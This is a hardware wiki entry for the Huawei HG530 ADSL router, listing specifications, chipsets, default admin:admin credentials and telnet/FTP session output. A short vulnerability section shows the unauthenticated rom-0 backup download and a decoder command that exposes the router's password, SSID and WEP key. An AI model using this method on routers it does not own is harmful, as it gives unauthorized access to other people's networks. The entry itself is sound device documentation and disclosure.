Huawei HG530
Huawei HG530
Country of manuf.: China
Type: wireless router, dsl modem
FCC ID: QISHG530
Power: 12 VDC, 0.5 A
Connector type: barrel
CPU1: TrendChip TC3162U
FLA1: 2 MiB2,097,152 B <br />16,384 Kib <br />2,048 KiB <br />16 Mib <br />0.00195 GiB <br /> (Macronix MX25L1606E)
RAM1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (EtronTech EM638165TS-6G)
Expansion IFs: none specified
WI1 chip1: Ralink RT3390
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL
ETH chip1: TrendChip TC3162U
Switch: TrendChip TC2206F
LAN speed: 100M
LAN ports: 4
bgn
Additional chips
DSL (ADSL2+) AFE;TrendChip;TC3086;TRENDCHIP, TC3086-QFN64-EPG, C2W49800, TP1130B5;1;
Stock FW OS: ZyNOS
Flags: ADSL2+
Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1304 additional devices
of which 16 are Huawei devices
Default login user: admin
Default login password: admin
admin:admin credentials used by 1324 additional devices
of which 15 are Huawei devices
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
For a list of all currently documented TrendChip chipsets with specifications, see TrendChip.
Huawei HG530 - Wireless ADSL Modem Router
Router is labeled: "bg Wi-Fi certified, with some n features". It is a draft-n router, compatible with 802.11n standard.
Same chipset as ZyXEL P-660HN-TxA (T1A, T3A), Billion BiPAC 5200W (Manual), and D-Link_DSL-2680_rev_A1 (2 LAN ports only).
Additional external links
Manuals
Firmware
Components
Command Line
- (selection of ZyXEL devices as no matching Huawei CLI guide found)
- Prestige 334w CI Command List
- CLI Reference Guide Version 3.70
- CLI Reference Guide Versions: 3.79, 3.80, 3.90, 4.00
- ZyNOS CI and BootBase Commands (ZyNOS 1999)
- Using the console port
Router login
The HG530 supports 3 different user names; login is possible by using the following protocols.
- Web interface: http
- Console login: telnet
- File transfer: ftp
Default login user & password
The HG530 was often distributed as custom branded version by ISP's such as Telmex or Claro
(both ISPs in the Latin America region) with non-standard login user/password combinations.
The pictures below show a Claro branded router with admin defaults found here (tested),
while defaults for user2 and user3 were extracted from rom-0 backup file (tested):
• login user & password |
---|
Claro Dominican Republic instructions suggests (untested):
Telmex branded router according to firmware update instructions (untested):
Other likely user/password combinations as found here and here (untested):
or
|
Telnet
Opens a session with the ZyNOS CI. All users (admin, user) have full privileges!
• telnet |
---|
$ telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. Username: admin Password: ******** Copyright (c) 2001 - 2011 Huawei HG530> help Valid commands are: sys exit ether wan etherdbg tcephydbg ip bridge dot1q pktqos show set lan HG530> sys modfTTL edit feature hostname log resetlog stdio syslog version view wdog romreset factoryreset atssid atwpakey atwepkey acl keytest atsh diag routeip bridge save display password default batchnumber versionstyle versionM multiuser password2nd username2nd deleteUser getusername2nd password3rd username3rd delete3rdUser getusername3rd adminname modelcheck attainrateflag pswauthen setser resetbtntime setdefaultlanip fwuptimeout sptromsize syncinterval tcpdebug cwmp socket filter cpu |
• sys version |
---|
HG530> sys version RAS version: V100R001C10B023 SALVADOR RAS version(web): V100R001B023 SALVADOR 2011/04/27 System ID: $5.1.54.0(RUE0.C2)3.12.8.20 20110407_V001 [Apr 07 2011 15:06:42] romRasSize: 1357172 system up time: 2:03:49 (b5601 ticks) bootbase version: VTC_SPI1.11 | 2011/03/11 HG530> sys atsh RAS version : V100R001B023 SALVADOR romRasSize : 1363726 bootbase version : VTC_SPI1.13 | 2011/10/13 Product Model : Home Gateway MAC Address : ACE87B008C88 Default Country Code : FF Boot Module Debug Flag : 00 RomFile Version : 01 RomFile Checksum : d396 RAS F/W Checksum : 5685 SNMP MIB level & OID : 050000000100000002000000030000000400000005 Main Feature Bits : 86 Other Feature Bits : 93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 HG530> sys getusername2nd secondUserName: usuario HG530> sys getusername3rd thirdUserName: user |
FTP
Gives write-only access to the firmware, and read/write access to the rom-0 backup file.
- Only user admin is allowed to login!
• ftp |
---|
$ ftp 192.168.1.1 Connected to 192.168.1.1. 220 HG530 FTP version 1.0 ready at Sat Jan 01 05:50:34 2000 Name (192.168.1.1:john): admin 331 Enter PASS command Password: 230 Logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 Port command okay 150 Opening data connection for LIST --w--w--w- 1 owner group 1363726 Jul 01 12:00 ras -rw-rw-rw- 1 owner group 131072 Jul 01 12:00 rom-0 ?226 File sent OK $ ftp 192.168.1.1 Connected to 192.168.1.1. 220 HG530 FTP version 1.0 ready at Sat Jan 01 02:08:30 2000 Name (192.168.1.1:john): user 530 User user cannot log in. Login failed. |
Vulnerabilities
rom-0
As many other ZyNOS based devices, the HG530 allows downloading the configuration backup file rom-0 without any authentication.
http://192.168.1.1/rom-0
The rom-0 file is LZS compressed (see reverse engineering the zyxel configuration backup file and static analysis).
- The java based rom-0 decoder from github reveals clear text login password, SSID and WEP key.
$ java -jar rom0.jar rom-0 .l.password.HG530.u.public.a.dhcpp.192.43.244.18.P.E.5.user.Turbonett.@.l.password.HG530.u.public.l.password.HG530.u.`.L.2`ISP-0.{. .turbonett.RN.}.d.-.@.@.L.0. .d.B.RN.w`.{.0.@.0.@.$.L.Q.'P.dhcppc.}.d.+.*.HG520.d. .$.(.0.SUA.8.P.Z.d. .$.A.^.>._=. .H. TURBONETT_008C88.d.+.*.74E75C4CDB.3.".%.@!.dd.d.RT3390_2.A.^.>._=.3. .H. TURBONETT_008C88.d.+.*.4.4.vlan14.5.C!.(.(.1`.W$h.(.(.1`.W$h.$.@.@usuario.%.Q.{/tr069.H.wei Technologies Co., Ltd.HG530.00E0FC.HG530TRA.0.1-.T.:.Z.4.33_4.0.H.0.Wf.
TBD: Credential disclosure in modems Huawei HG510, HG520x, HG530 and possibly others [1] [2] [3] [4] [5]
Images
from User:Zerohero
P.S. Others pictures [6] [7] do show a 3rd on-board switching regulator.